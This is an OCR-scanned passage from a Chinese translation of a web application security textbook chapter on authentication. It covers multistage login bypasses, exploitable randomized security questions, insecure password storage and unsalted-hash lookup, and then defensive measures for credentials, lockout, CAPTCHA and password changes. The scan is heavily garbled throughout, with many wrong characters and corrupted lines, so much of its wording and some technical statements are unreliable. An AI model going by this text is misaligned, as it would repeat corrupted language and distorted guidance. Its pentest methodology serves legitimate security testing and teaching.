stage2complete=true, 那么 攻击 者 就 可 以 通过 设置 这 个 值 直接 进入 第 三 个 阶段 。 尝试 修改 
应 用 程序 提交 的 值 ， 确 定 是 否 可 以 使 用 这 种 方法 进入 或 省 略 登 录 阶 段 。 






























































尝试 访问 
http://mdsec.net/auth/195/ 
http://mdsec.net/auth/199/ 
http://mdsec.net/auth/203/ 
http://mdsec.net/auth/206/ 
http://mdsec.net/auth/211/ 





一 些 登 录 机 制 在 其 中 一 个 登录 阶段 提出 一 个 随机 变化 的 问题 。 例 如 ， 提 交 用 户 名 和 密码 后 ， 
应 用 程序 会 向 用 户 提 出 许多 “机 密 ” 问 题 中 的 一 个 (天 于 用 户 母 杀 的 女 家 姓 、 出 生地 、 小 学 名 称 
等 )， 或 者 要 求 其 提交 一 个 机 密 短语 中 的 两 个 随机 字母 。 采 用 这 种 做 法 的 基本 原理 在 于 : 即使 攻 
击 者 截获 了 用 户 在 某 个 时 候 输 入 的 全 部 信息 , 他 也 无 法 在 其 他 时 刻 作为 该 用 户 登 录 , 因为 这 时 应 
用 程序 将 提出 不 同 的 问题 。 

在 菏 些 执行 过 程 中 ， 这 种 功能 会 遭 到 破坏 ， 因 而 无 法 实现 其 日 的 。 

口 应 用 程序 可 能 会 提出 一 个 随机 选择 的 问题 ,把 有 关 问 题 的 细 市 你 存在 隐藏 的 HTML 表 单子 
段 中 ， 而 不 是 服务 各 上 。 随 后 用 户 提 交 该 问题 及 其 答案。 这样， 攻击 者 就 能 够 选择 回答 
哪个 问题 ， 允 许 他 们 截获 用 户 在 某 个 时 候 的 输入 后 ， 重 复 使 用 截获 的 信息 进行 登录 。 

口 应 用 程序 可 能 会 对 每 个 登录 符 试 提出 一 个 随机 选择 的 问题 ， 但 如 采 茶 个 用 户 无 法 回答 该 
问题 ， 它 并 不 记 住 向 该 用 户 提 出 了 什么 问题 。 如 末 该 用 户 稍 后 又 提交 一 次 登录 尝试 ， 应 
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用 程序 又 生成 为 一 个 随机 问题 。 这 允许 攻击 者 过 历 所 有 问题 ， 直 到 收 到 他 们 知道 答案 的 
那个 问题 ， 从 而 利用 在 某 个 时 候 截 获 的 用 户 输入 重复 进行 登录 。 





注解 ”上面 的 第 二 种 情况 确实 相当 微妙 ， 因 此 ， 许 多 现实 中 的 应 用 程序 都 易于 受到 攻 
击 。 初 看 上 去 ， 要 求 用 户 回答 一 个 值得 纪念 的 词 中 的 两 个 字母 的 应 用 程序 似乎 能 够 正 
党 运转 ， 增 强 登 录 机 制 的 安全 。 但 是 ， 如 果 每 次 在 通过 前 一 个 验证 阶段 后 随机 选择 两 


个 字母 ， 那 么 截获 用 户 在 某 个 时 候 的 登录 信息 的 攻击 者 只 需 重 复 进 入 这 个 验证 阶段 ， 
直到 应 用 程序 要 求 提交 他 知道 的 两 个 字母 为 止 ， 这 样 做 也 不 存在 任何 账户 锁定 风险 。 


渗透 测试 步骤 

(1) 如 有 果 一 个 登录 阶段 使 用 一 个 随机 变化 的 问题 ， 确 定 问题 本 号 是 否 和 回答 一 起 提交 。 如 
条 是 这 样 ， 改 变 这 个 问题 并 提交 正确 答案 ， 看 看 是 否 仍然 能 够 成 功 登 录 。 

(2) 如 采 应 用 程序 并 不 允许 攻击 者 提 区 任意 问题 和 答案 ， 用 同一 个 账户 进行 部 分 登录 ， 
次 进行 到 出 现 不 同 的 问题 为 止 。 如 果 每 次 都 出 现 不 同 的 问题 , 那么 攻击 者 仍然 能 够 选择 回答 哪 


个 问题 。 














尝试 访问 
http://mdsec.net/auth/178/ 
http://mdsec.net/auth/182/ 


注解 ”在 一 些 登 录 组 件 随机 变化 的 应 用 程序 中 ， 应 用 程序 在 一 个 阶段 收集 用 户 的 全 部 
证 书 。 例如， 主 登 录 页 面 中 可 能 显示 一 个 表单 ， 其 中 包含 用 户 名 、 密 码 和 一 个 机 密 问 
题字 段 ， 且 当 每 次 加 载 登 录 页 面 时 ， 机 密 问题 都 会 发 生 改 变 。 在 这 种 情况 下 ， 机 密 问 
题 的 随机 性 根本 无 法 阻止 已 经 截获 一 名 用 户 在 菜 个 时 候 的 输入 信息 的 攻击 者 重新 传送 





有 效 的 登录 请 求 ， 也 无 法 修改 登录 过 程 以 实现 这 种 目的 ， 因 为 攻击 者 只 需 重 复 加 载 登 
录 页 面 ， 直 到 找到 他 知道 答案 的 问题 。 在 另 一 种 类 似 的 情况 下 ， 应 用 程序 可 能 会 设置 
一 个 持久 性 cookie, “确保 ”向 特定 用 户 提 出 相同 的 问题 ， 直 到 该 用 户 正 确 回答 这 个 问 
题 。 当 然 ， 攻 击 者 只 需 修改 或 删除 这 个 cookie 就 能 够 轻 为 训 开 这 种 防御 措施 。 





6.3.3 不 安全 的 证 书 存储 

如 果 应 用 程序 以 不 安全 的 方式 存储 登录 证 书 , 那么 , 即使 验证 过 程 本 身 并 不 存在 缺陷 , 登录 
机 制 的 安全 也 会 被 削弱 。 

Web 应 用 程序 常常 以 危险 的 方式 将 用 户 证 书 存 储 在 数据 库 中 ， 这 包括 以 明文 形式 存储 密码 。 
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但 是 , 即使 使 用 MD5 或 SHA-1 等 标准 算法 对 密码 进行 散 列 处 理 , 攻击 者 仍然 可 以 在 预 完 计算 的 散 
列 值 数 据 库 中 碍 找 观 察 到 的 散 列 。 因 为 应 用 程序 使 用 的 数据 库 账 户 必 须 能 够 随时 谈 / 写 这 些 证 书 ， 
攻击 者 可 以 利用 应 用 程序 中 的 许多 其 他 漏洞 访问 这 些 证 书 ， 例 如 ， 命 令 、SQL 注 入 漏洞 〈 参 阅 第 
9 草 ) 或 访问 控制 漏洞 〈 参阅 第 8 章 )。 




















尝试 访 问 
一 些 在 线 数据 库 的 稼 见 散 列 晒 数 可 从 以 下 网 址 查看 : 


http://passcracking.com/index.php 
http://authsecu.com/decrypter-dechiffrer-cracker-hash-md$/script-hash-md5 .php 





渗透 测试 步 双 


(1) 分析 应 用 程序 中 所 有 与 验证 有 关 的 功能 以 及 任何 与 用 户 维护 有 关 的 功能 。 如 采 发 现任 














何 回 客 户 痪 返回 用 户 密码 的 情况 , 即 表 明 应 用 程序 并 未 以 安全 的 方式 你 存 密码 ,或 者 密码 以 明 
文 方式 呈现 ， 或 应 用 程序 使 用 了 可 还 原 加 密 形 式 保存 密码 。 
(2) 如 果 发 现 应 用 程序 中 存在 任何 一 种 任意 命令 或 查询 执行 漏洞 ， 设 法 确定 应 用 程序 将 用 
尸 证 书 保 存在 数据 库 或 文件 系统 的 什么 位 置 。 
(a) 找到 这 些 位 置 ， 弄 清 应 用 程序 是 否 以 非 加 密 形 式 保存 密码 。 
(b) 如 末 以 散 列 形式 存储 密码 ， 则 应 检查 表明 账户 分 配 有 常用 或 默认 密码 ， 以 及 散 列 
并 未 经 过 “加 salt” 处 理 的 非 唯一 值 。 
(c) 如 条 使 用 标准 算法 以 “不 加 salt 的 散 列 ”形式 存储 密码 ,， 则 应 查询 在 线 散 列 数据 库 ， 
以 确定 对 应 的 明文 密码 值 。 


























6.4 保障 验证 机 制 的 安全 


执行 安全 的 验证 解决 方案 需要 同时 满足 几 个 关键 安全 目标 ， 许 多 时 候 也 需要 牺牲 其 他 目标 ， 
如 功能 、 易 用 性 和 总 成 本 。 有 些 时 候 , “更 加 ”安全 实际 上 可 能 适得其反 。 例 如 ,强迫 用 户 设 置 
超 长 密码 并 频 蒙 修改 密码 往往 促使 他 们 将 密码 记录 下 来 因而 导 人 致密 码 汇 韦 )。 

鉴于 验证 漏洞 的 多 样 性 , 以 及 应 用 程序 需要 采取 非常 复杂 的 防御 措施 以 减轻 所 有 这 些 漏 洞 的 
危害 ,许多 应 用 程序 设计 者 与 开发 者 选择 接受 某 些 威胁 ， 以 集中 精力 阻止 最 严重 的 攻击 。 在 实现 
这 种 防御 平衡 的 过 程 中 ， 我 们 需要 考虑 以 下 因素 。 

口 应 用 程序 所 提供 功能 的 安全 程度 。 

口 用 户 对 不 同类 型 的 验证 控制 的 容 八 和 接受 程度 。 

口 文 持 一 个 不 够 友好 的 用 户 界 面 系 统 所 需 的 成 本 。 

口 苋 争 性 解决 方 条 相对 于 应 用 程序 可 能 产生 的 收入 方面 的 金融 成 本 或 它 所 保护 资产 的 价值 。 
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我 们 将 在 本 方 说 明 阻 止 各 种 针对 验证 机 制 攻击 的 最 有 效 方法 , 然后 让 读者 日 行 决定 哪 种 防御 
措施 最 适合 他 们 的 特殊 需求 。 


6.4.1 使 用 可 对 的 证 书 


D 应 强制 执行 适当 的 最 小 密码 强度 要 求 。 这 些 要 求 包括 : 最 小 密码 长 度 ， 使 用 字母 、 数 字 
和 排版 学 符 ， 同 时 使 用 大 、 小 写字 符 ， 避 人 免 使 用 字典 中 的 单词 、 名 称 和 其 他 常见 密码 ， 
避免 以 用 户 名 为 密码 ， 避 免 使 用 和 以 前 的 密码 相似 或 完全 相同 的 密码 。 和 大 多 数 安全 措 
施 一 梓 ， 不 同 的 密码 强度 要 求 适用 于 不 同类 型 的 用 户 。 

口 应 使 用 唯一 的 用 户 名 。 

品系 统 生成 的 任何 用 户 名 和 密码 应 具有 足够 的 随机 性 ， 其 中 不 包含 任何 顺序 ， 即 使 攻击 者 
访问 大 量 连续 生成 的 实例 也 无 法 对 其 进行 预测 。 

口 允许 用 户 设 置 足 够 强大 的 密码 。 例 如 ， 应 允许 其 设置 长 密码 ， 人 允许 在 密码 中 使 用 各 种 类 
型 的 字符 。 











6.4.2 ”安全 处 理 证 书 


口 应 以 不 会 造成 非 授 权 汇 露 的 方式 创建 、 保 存 和 传送 所 有 证 书 。 

口 应 使 用 公认 的 加 密 技术 (如 SSL ) 保护 客户 端 与 服务 咒 间 的 所 有 通信 。 既 无 必要 也 不 需要 
使 用 定制 解决 方案 保护 传输 中 的 数据 。 

口 如 果 认 为 最 好 在 应 用 程序 的 不 需 验证 的 区 域 使 用 HTTP, 必须 保证 使 用 HTTPS 加 载 登 录 表 
单 ， 而 不 是 在 提交 登录 信息 时 才 转 换 到 HTTPS。 

口 只 能 使 用 PosT 请 求 加 服务 融 传 输 证书 。 绝 不 能 将 证 书 放 在 URL 人 参数 或 cookie 中 〈 即 使 临 
时 放置 也 不 行 ) 绝 不 能 将 证 书 返还 给 客户 端 ， 即 使 是 通过 重 定 回 参数 传送 也 不 行 。 

口 所 有 服务 顺 - 客 户 端 应 用 程序 组 件 应 这 样 保存 证 书 : 即使 攻击 者 能 够 访问 应 用 程序 数据 库 
中 存储 的 所 有 相关 数据 ， 他 们 也 无 法 轻易 恢复 证 书 的 原始 值 。 达 到 这 种 目的 最 向 用 的 方 
法 是 使 用 强大 的 散 列 函数 (如 至 本 书 截稿 时 的 SHA-256 函 数 )， 并 对 其 进行 “加 salt 处 理 ” 
以 降低 预先 计算 的 离线 攻击 ( precomputed offline attack ) 的 危害 。 该 salt 应 特定 于 拥有 密 
但 的 账户 ， 以 防止 攻击 者 重播 或 答 换 散 列 值 。 

口 一 般 来 说 ， 客 户 端 “ 记 住 我 ”功能 应 仅 记 忆 如 用 户 名 之 类 的 非 保密 数据 。 在 安全 要 求 较 
低 的 应 用 程序 中 ， 可 适当 人 允许 用 户 选择 一 种 工具 来 记 住 密码 。 在 这 种 情况 下 ， 客 户 端 不 
应 保存 明文 证 书 ( 应 使 用 密 钥 以 可 逆 加 密 的 形式 保存 密码 , 上 且 只 有 服务 硕 知 道 这 个 密 钥 ); 
并 癌 用 户 警 告 直接 访问 他 们 的 计算 机 或 远程 攻破 他 们 计算 机 的 攻击 者 可 能 造成 的 风险 。 
应 特别 注意 消除 应 用 程序 中 存在 的 可 用 于 盗 田 其 中 保存 的 证 书 的 蜂 站 点 脚本 漏洞 〈 请 参 
阅 第 12 章 了 解 相 关内 容 )。 

口 应 使 用 一 种 密码 修改 工具 〈 请 参阅 6.4.6 广 )， 要 求 用 户 定期 修改 其 密码 。 

口 如 果 以 非 正 和 常 交 互 的 形式 癌 新 建 账户 分 配 证 书 ， 应 以 尽 可 能 安全 的 形式 传送 证 书 ， 并 设置 
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时 间 限 制 ， 要求 用 户 在 第 一 次 登录 时 更 改 证 书 ， 并 告诉 用 户 在 初次 使 用 后 销 虹 通 信 汇 道 。 

口 应 考虑 在 适当 的 地 方 使 用 下 拉 末 单 而 非 文 本 字段 截取 用 户 的 一 些 登录 信息 ( 如 值得 纪念 
的 词 中 的 一 个 字母 ) 这样 做 可 防止 安 疙 在 用 户 计 算 机 上 的 键盘 记录 带 截 获 他 们 提交 的 所 
有 数据 。( 但 是 , 还 请 注意 , 简单 的 键盘 记录 各 只 是 攻击 者 用 于 截获 用 户 输 入 的 一 种 手段 。 
如 果 攻 击 者 已 经 攻破 用 户 的 计算 机 ， 那 么 从 理论 上 讲 ， 他 就 能 够 记录 计算 机 上 发 生 的 各 
种 类 型 的 事件 ， 包 括 了 鼠标 活动 、 通 过 HTTPS 提 交 的 表单 以 及 截屏 。 ) 





























6.4.3 正确 确认 证 书 


口 应 确认 完整 的 密码 。 也 就 是 说 ， 区 分 大 小 写 ， 不 过 滤 或 修改 任何 字符 ， 也 不 截 短 密码 。 

口 应 用 程序 应 在 登录 人 处理 过 程 中 主动 防御 无 法 预料 的 事件 。 例 如 ， 根 据 所 使 用 的 开发 语言 ， 
应 用 程序 应 对 所 有 API 调 用 使 用 “全 捕获 ”型 异常 处 理 程序 ( catch-all exception handler )。 
这 些 程序 应 明确 删除 用 于 控制 登录 状态 的 所 有 会 话 和 方法 内 部 数据 ( method-local data )， 
并 使 当前 会 话 完 全 失效 。 因 此 , 即使 攻击 者 以 某 种 方式 避 开 验证 , 也 会 被 服务 需 强 制 退出 。 

口 应 对 验证 逻辑 的 伪 代 码 和 实际 的 应 用 程序 源 代 人 码 进 行 仔细 的 代码 审查 ， 以 确定 故障 开放 
条 件 之 类 的 逻辑 错误 。 

口 如 采 应 用 程序 执行 支持 用 户 伪装 功能 ， 应 严格 控制 这 种 功能 ， 以 防止 攻击 者 滥用 它 获得 
未 授权 访问 。 鉴 于 这 种 功能 的 危险 程度 ， 通 常 有 必要 从 面 回 公 众 的 应 用 程序 中 彻底 删除 
该 功能 ， 只 对 内 部 管理 用 户 开 放 该 功能 ， 而 且 他 们 使 用 伪装 也 应 接受 严格 控制 与 审核 。 

口 应 对 多 阶段 登录 进行 严格 控制 ， 以 防止 攻击 者 破坏 登录 阶段 之 间 的 转换 与 关系 。 

四 有 天 登录 阶段 进展 和 前 面 验证 任务 结 采 的 所 有 数据 应 保存 在 服务 硕 端 会 话 对 象 中 ， 缀 
不 可 传送 给 客户 问 或 由 其 读 取 。 

@ 森 止 用 户 多 次 提交 一 项 登录 信息 ; 禁止 用 户 修 改 已 经 被 收 集 或 确认 的 数据 。 如 果 需 要 
在 几 个 阶段 使 用 同一 个 数据 ( 如 用 户 名 )， 应 在 第 一 次 收集 时 将 该 数据 保存 在 会 话 变量 
中 ， 随 后 从 此 处 引用 该 数据 。 

@ 在 每 一 个 登录 阶段 ， 应 首先 核实 前 面 的 阶段 均 已 顺利 完成 。 如 果 发 现 前 面 的 阶段 没有 
完成 ， 应 立即 将 验证 尝试 标记 为 恶意 尝试 。 

@ 为 防止 泄露 的 是 哪个 登录 阶段 失败 ( 攻击 者 可 利用 它 轮 流 针对 每 个 阶段 发 动 攻 击 ) 的 

诗 县 ， 即 使 用 户 无 法 正确 完成 前 面 的 阶段 、 即 使 最 初 的 用 户 名 无 效 ， 应 用 程序 也 应 总 
是 处 理 完 所 有 的 登录 阶段 。 在 处 理 完 所 有 的 登录 阶段 后 ， 应 用 程序 应 在 最 后 阶段 结 
时 呈现 一 条 和 背 规 “登录 失败 ”消息 ， 并 且 不 提供 失败 位 置 的 任何 信息 。 

口 如 果 在 登录 过 程 中 需要 回答 一 个 随机 变化 的 问题 ， 请 确保 攻击 者 无 法 选择 回答 问题 。 

四 总 是 采用 一 个 多 阶段 登录 过 程 ， 在 第 一 阶段 确认 用 户 映 份 ， 并 在 后 面 的 阶段 回 用 户 提 
出 随机 变化 的 问题 。 

四 如 采 已 回 某 一 用 户 提 出 一 个 特定 的 问题 ， 将 该 问题 保存 在 永久 性 用 户 资 料 中 ， 确 保 每 
次 该 用 户 符 试 登录 时 问 其 提出 相同 的 问题 ， 直 到 该 用 户 正 确 回答 这 个 问题 。 
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@ 如 琳 癌 某 个 用 户 提 出 一 个 随机 变化 的 质询 ， ean itd 
非 HIML 表 单 的 隐藏 字段 中 ， 并 根据 保存 的 问题 核实 用 户 随 后 提供 的 答案 。 


























注解 a ee tn 可 证 
时 稍 不 谨慎 就 可 能 给 攻击 者 提供 用 户 名 枚 举 的 机 会 。 例 如 ， 为 防止 攻击 者 选择 回答 
知道 答 生 的 问题 ， 应 用 程序 可 能 会 将 该 用 己 提 出 的 最 后 一 ee FF ea 
并 不 断 提出 该 问题 直到 得 到 正确 答 和 全。 这样 ， 使 用 相同 用 户 名 多 次 登录 的 攻击 者 就 会 
遇 到 相同 的 问题 。 但 是 ， 如 果 攻 击 者 使 用 一 个 无 效 的 用 户 名 进行 相同 的 操作 ， 应 用 程 
序 处 理 的 方法 可 能 会 有 所 不 同 : 由 于 没有 与 无 效用 户 名 有 关 的 用 户 资料 ， 也 没有 问题 
被 保存 起 来 ， 因 此 ， 应 用 程序 将 提出 一 个 不 同 的 问题 。 攻 击 者 可 以 利用 这 种 在 多 次 登 
录 尝 试 中 表现 出 来 的 行为 差异 ,推断 菜 个 特殊 用 户 名 的 有 效 性 。 在 一 次 自 定义 攻击 中 ， 
攻击 者 能 够 迅速 获得 大 量 用 户 名 。 

如 果 应 用 程序 希望 防御 这 种 可 能 性 ， 它 必须 采取 一 些 预防 措施 。 如 果 收 到 使 用 无 
效用 户 名 发 起 的 登录 党 试 ， 应 用 程序 必须 在 茶 个 位 置 记录 向 这 个 无 效用 户 名 提出 的 随 
机 问题 ， 并 确保 随后 使 用 这 个 用 户 名 登录 都 会 遇 到 相同 的 问题 。 更 进一步 ， 应 用 程序 
可 定期 更 换 到 一 个 不 同 的 问题 ， 模 拟 不 存在 的 用 户 已 作为 正常 用 户 登 录 ， 导 致 提出 的 
下 一 个 问题 出 现 变化 。 但 是 ， 从 某 种 意义 上 说 ， 应 用 程序 设计 者 必须 做 出 让 步 ， 因 为 
挫败 意志 如 此 坚定 的 攻击 者 几乎 是 不 可 能 的 。 





6.4.4 ”防止 信息 泄露 


应 用 程序 使 用 的 各 种 验证 机 制 不 应 通过 公开 的 消息 ,或 者 通过 从 应 用 程序 的 其 他 行为 进 
行 推断 ， 来 揭示 关于 验证 参数 的 任何 信息 。 攻 击 者 应 无 法 判定 是 提交 的 哪个 数据 造成 了 
人 
口 应 由 单独 一 个 代码 组 件 使 用 一 条 和 滑 规 消息 负责 响应 所 有 失败 的 登录 党 试 。 这 样 做 可 避免 
由 不 同 代码 路 径 返 回 的 本 应 不 包含 大 量 信息 的 消息 ee 
HTTP 状 态 码 、 其 他 隐藏 在 HTML 中 的 信息 等 内 容 而 让 攻击 者 看 出 差别 ， 从 而 产生 个 细 
微 的 漏洞 。 
口 如 果 应 用 程序 实行 某 种 账户 锁定 以 防止 蛋 力 攻击 (如 6.4.5 市 所 述 )， 应 小 心 处 理 以 防 造成 
息 泄露 。 例 如 ， 如 果 应 用 程序 透露 , 由 于 了 次 失败 登录 , 已 将 某 个 特殊 的 账户 冻结 分 
钟 ， 这 种 和 本 为 就 可 被 用 于 枚 举 有 效 的 用 户 名 。 另 外 ， 明 确 公开 账户 锁定 策略 标准 也 使 攻 
击 者 能 够 调整 任何 登录 答 试 ， 不 顾 锁 定 政策 继续 猜测 密码 。 为 避免 用 户 名 枚 举 ， 如 果 从 
相同 浏览 器 发 出 一 系列 失败 的 登录 尝试 ， 应 用 程序 应 通过 一 条 和 常规 消息 提出 敬告 :如果 
出 现 多 次 登录 失败 ， 账 户 将 被 冻结 ， 并 建议 用 户 稍 后 再 试 。 可 通过 使 用 一 个 cookie 或 隐藏 
字段 追踪 来 自 相 同 浏览 妖 的 重复 登录 失败 ， 从 而 达到 上 述 目的 。( 当然 ， 不 应 使 用 这 种 机 
制 实行 任何 实际 的 安全 控制 ， 仅 用 于 为 努力 回忆 其 证 书 的 普通 用 户 提供 帮助。) 
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口 如 采 应 用 程序 文 持 目 我 注册 , 那么 它 能 够 以 两 种 方式 防止 这 种 功能 被 用 于 枚 举 现 有 用 户 名 。 

@ 不 人 允许 自我 选择 用 户 名 ， 应 用 程序 可 为 每 个 新 用 户 建 立 一 个 唯一 ( 和 无 法 预测 ) 的 用 
户 名 ， 防 止 应 用 程序 披露 表明 一 个 选 定 的 用 户 名 已 经 存在 的 信息 。 

@ 应 用 程序 可 以 使 用 电子 邮件 地 址 作为 用 户 名 。 如 末 是 这 样 ， 应 用 程序 会 在 登录 过 程 的 
第 一 个 阶段 要 求 用 户 输 入 他 们 的 电子 邮件 地 址 ， 然 后 告诉 他 们 等 待 接收 一 封 电 子 邮 件 ， 
按照 其 中 的 指示 操作 。 如 采 电 子 邮 件 地 址 已 经 被 注册 ， 应 用 程序 会 在 电子 邮件 中 通知 
用 户 。 如果 该 地 址 没有 被 注册 , 应 用 程序 会 要 求 用 户 访问 一 个 唯一 的 、 无 法 猜测 的 URL 
继续 注册 过 程 。 这 样 可 防止 攻击 者 枚 举 有 效 的 用 户 名 《除非 他 们 碰巧 已 经 攻破 大 量 电 
子 邮 件 账户 )。 


6.4.5 ”防止 蛮 力 攻击 


D 必须 对 验证 功能 执行 的 各 种 质询 采取 保护 措施 ， 防 止 攻击 者 企图 使 用 日 动工 具 响 应 这 些 
质询 。 这 包括 登录 机 制 、 修 改 赛 码 功能 和 恢复 遗 扎 密码 等 功能 中 的 质询 。 

口 使 用 无 法 预测 的 用 户 名 ， 同 时 阻止 用 户 名 枚 举 ， 给 完全 育 目 的 蛮 力 攻击 设置 巨大 障碍 ， 
并 要 求 攻击 者 在 实施 攻击 前 已 经 通过 采种 方式 发 现 一 个 或 几 个 特殊 的 用 户 名 。 

D 一 些 对 安全 性 要 求 极 高 的 应 用 程序 ( 如 电子 银行 ) 在 检测 到 少数 几 次 ( 如 3 次 ) 登录 失败 
后 应 立即 蔡 用 该 账户 ， 并 要 求 账户 所 有 者 采取 各 种 非常 规 步 又 重新 激活 该 账户 ， 如 给 呼 
叫 中 心 拨打 电话 并 回答 一 系列 安全 问题 。 这 种 宋 略 的 缺点 在 于 : 它 允 许 攻击 者 通过 重复 
茶 用 合法 用 户 的 账户 回 他 们 发 动 拒 绝 服 务 攻击 ， 因 而 增加 了 提供 账户 恢复 服务 的 成 本 。 
一 种 更 加 均衡 的 集 略 适用 于 非 第 注音 安全 的 应 用 程序 ， 即 在 检测 到 少数 几 次 ( 如 3 次 ) 登 
录 失 败 后 将 该 账户 冻结 一 段 时 间 ( 如 30 分 钟 ) 这 种 策略 可 有 效 阻 止 密码 猜测 攻击 ， 同 时 
可 降低 拒绝 服务 攻击 风险 ,减轻 呼叫 中 心 的 工作 负担 。 

口 如 来 采用 临时 冻结 账户 的 环 上 略 ， 应 采取 措施 确保 这 种 傈 上 略 的 效率 。 

@ 为 防止 信息 泄露 导致 用 户 名 枚 举 ， 应 用 程序 绝 不 能 透露 任何 账户 冻结 信息 。 相 反 ， 应 
用 程序 应 对 一 系列 即使 是 使 用 无 效用 户 和 名 发 起 的 失败 登录 做 出 啊 应 ， 通 过 一 条 篆 规 消 
县 提出 警告 : 如 果 出 现 多 次 登录 和 失败， 账户 将 被 冻结 ， 建 议 用 户 稍 后 再 试 ( 如 前 文 所 
述 )。 

应 用 程序 不 应 回 用 户 透 露 账户 锁定 标准 。 只 要 告诉 合法 用 户 “ 稍 后 再 试 ” 并 不 会 显 

车 降低 服务 质量 。 但 告知 攻击 者 应 用 程序 到 底 能 够 容 礼 多 少 次 失败 的 登录 尝试 、 账 

户 冻 结 期 有 多 长 ， 就 会 让 他 们 对 任何 登录 尝试 进行 调整 ， 不顾 账 户 锁 定 荣 略 而 继续 

育 测 密码 。 

如 条 一 个 账户 被 冻结 ， 那 么 应 用 程序 不 用 检查 用 户 证 书 ， 百 接 就 可 以 拒绝 该 账户 的 登 

录 答 试 。 因 为 一 些 应 用 程序 在 冻结 期 继续 完全 处 理 登 录 答 试 ， 并 且 在 提交 有 效 证 书 时 

返回 一 条 差异 并 不 明显 (或 者 差 寞 比较 明显 ) 的 消息 ， 因 此 尽管 应 用 程序 执行 账户 冻 

结 策 略 ， 攻 击 者 仍然 能 够 利用 这 种 行为 实施 彻底 有 效 的 蛮 力 攻击 。 
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口 账户 锁定 之 类 的 常规 应 对 措施 对 防御 一 种 极其 有 效 的 蛋 力 攻击 并 没有 帮助 ， 即 遍历 大 量 枚 
誉 出 的 用 户 名 ， 检 查 单独 一 个 甩 弱 密码 ， 如 password。 例 如 ， 如 果 5 次 登录 失败 就 会 触发 
账户 冻结 , 这 意味 着 攻击 者 能 够 对 每 个 账户 尝试 使 用 4 个 不 同 的 密码 , 而 不 会 引起 任何 中 断 。 
如 果 一 个 应 用 程序 使 用 许多 脆弱 密码 ， 使 用 上 述 攻击 手段 的 攻击 者 就 能 够 攻破 许多 账户 。 

当然 ， 如 采 验 证 机 制 其 他 区 域 的 设计 安全 可 徘 , 这 种 攻击 的 效率 就 会 显著 降低 。 如 果 攻 击 者 
无 法 枚 举 或 有 效 预 测 出 用 户 名 ， 他 就 需要 实施 蛋 力 攻击 以 猜测 用 户 名 ， 其 攻击 速度 也 随 之 减 慢 。 
如 采 应 用 程序 执行 了 严格 的 密码 强度 要 求 , 攻击 者 更 没有 可 能 选择 菏 个 应 用 程序 用 户 已 经 选择 的 
密码 进行 测试 。 

除 以 上 控制 外 ， 应 用 程序 还 可 以 在 每 个 可 能 成 为 亦 力 攻击 目标 的 页 面 ( 见 图 6-9 ) 使 用 
CAPTCHA”( 全 自动 区 分 人 类 和 计算 机 的 图 灵 测 试 ) 质询 ,专门 防御 这 种 攻击 。 实 际 上 ,这 种 措 
施 可 防止 攻击 者 癌 任 何 应 用 程序 页 面目 动 提交 数据 ， 从 而 阻止 其 手动 实施 各 种 密码 猜测 攻击 。 实 
际 上 ， 人 们 已 经 对 CAPTCHA 技 术 进 行 了 大 量 的 研究。 有 些 时 候 ， 人 针对 这 种 技术 的 目 动 攻击 已 经 
能 够 取得 相当 的 成 效 。 此 外 ， 一 些 攻击 者 甚至 发 起 了 破解 CAPTCHA 的 欧 宪 ， 利用 不 知情 的 公众 
人 物 作为 标 靶 帮助 攻击 者 实施 攻击 。 但 是 ,即使 一 类 特殊 的 质询 无 法 完全 生效 ,， 它 仍然 可 使 大 多 
数 随意 的 攻击 者 停止 攻击 行动 ， 转 而 寻找 并 不 使 用 这 种 技术 的 应 用 程序 。 






























































Type the characters youy see in the picture above. 


图 6-9” 旨 在 阻止 自动 攻击 的 CAPTCHA 控 件 





提示 攻击 者 在 攻击 一 个 使 用 CPATCHA 控 件 阻 止 自 动 攻 击 的 应 用 程序 时 一 定 会 仔细 检 
YY 查 图 像 页 面 的 HTML 源 代码 。 我 们 曾 遇 到 过 许多 实例 ， 其 中 迹 题 的 答案 以 文字 形式 出 


现在 图 像 标 签 的 ALT 属 性 或 一 个 隐藏 表单 字段 中 ， 这 使 精明 的 攻击 者 不 必 解 开 谜 题 就 
可 以 解除 应 用 程序 执行 的 保护 。 





6.4.6 ”防止 小 用 密码 修改 功能 


口 应 用 程序 应 始终 执行 密码 修改 功能 ， 允 许 定 期 使 用 的 密码 到 期 终止 ( 如 有 必要 ) 并 允许 
用 户 修改 密码 ( 不管 他 们 出 于 任何 原因 硕 望 修改 密码 )。 作 为 一 种 关键 的 安全 机 制 ， 我 们 
必须 精心 设计 这 项 功能 以 防止 滥用 。 








GD CAPTCHA 项 目 是 Completely Automated Public Turing Test to Tell Computers and Humans Apart (全 自动 区 分 计算 机 和 人 类 
的 图 灵 测 试 ) 的 简称 , 已 由 卡 内 基 梅 隆 大 学 注册 商标 。CAPTCHA 是 区 分 计算 机 和 人 类 的 一 种 程序 算法 ， 这 种 程序 必须 
能 生成 并 评价 人 类 能 很 容易 通过 但 计算 机 却 通 不 过 的 测试 。 这 个 要 求 本 映 就 是 悖 论 ， 因 为 这 意味 着 一 个 CAPTCHA 必 须 
能 生成 一 个 它 目 己 不 能 通过 的 测试 。 一 一 详 者 注 





6.4 保障 验证 机 制 的 安全 145 


口 只 能 从 已 通过 验证 的 会 话 中 访问 该 功能 。 

口 不 应 以 任何 方式 下 接 提 供用 户 名 ,也 不 能 通过 隐藏 表单 字段 或 cookie 提 供用 户 名 。 用 户 企 
图 修改 他 人 密码 的 行为 属 非法 行为 。 

口 作为 一 项 高 级 防御 措施 ， 应 用 程序 应 对 密码 修改 功能 加 以 剑 护 ， 防 止 攻击 者 通过 其 他 安 
全 缺陷 ， 如 会 话 支持 源 洞 、 跨 站 点 脚本 ,其 至 是 无 人 看 管 的 终 弄 获得 未 授权 访问 。 为 达 
到 这 种 目的 ， 应 要 求 用 户 重新 输入 现 有 和 密码。 

口 为 防止 错误 ,新 密码 应 输入 两 次 。 应 用 程序 应 首先 比较 “新 密码 ”与 “确认 新 密码 ”学 
段 ， 看 它们 是 否 匹配 ， 如 有 果 不 相 匹配 ， 返 回 一 条 详细 的 错误 消息 。 

口 该 功能 应 阻止 可 能 针对 主要 登录 机 制 的 各 种 攻击 : 应 使 用 一 条 常规 错误 消息 告知 用 户 现 
有 证 书 中 出 现 的 任何 错误 ; 如 琳 修 改 密码 的 演 试 出 现 少数 几 次 失败 ， 应 临时 冻结 该 功能 。 

口 应 使 用 非常 规 方式 〈《 如 通过 电子 邮件 ) 通知 用 户 其 密码 已 被 修改 ， 但 通知 消息 中 不 得 包 
含 用 户 的 旧 证 书 或 新 证 书 。 


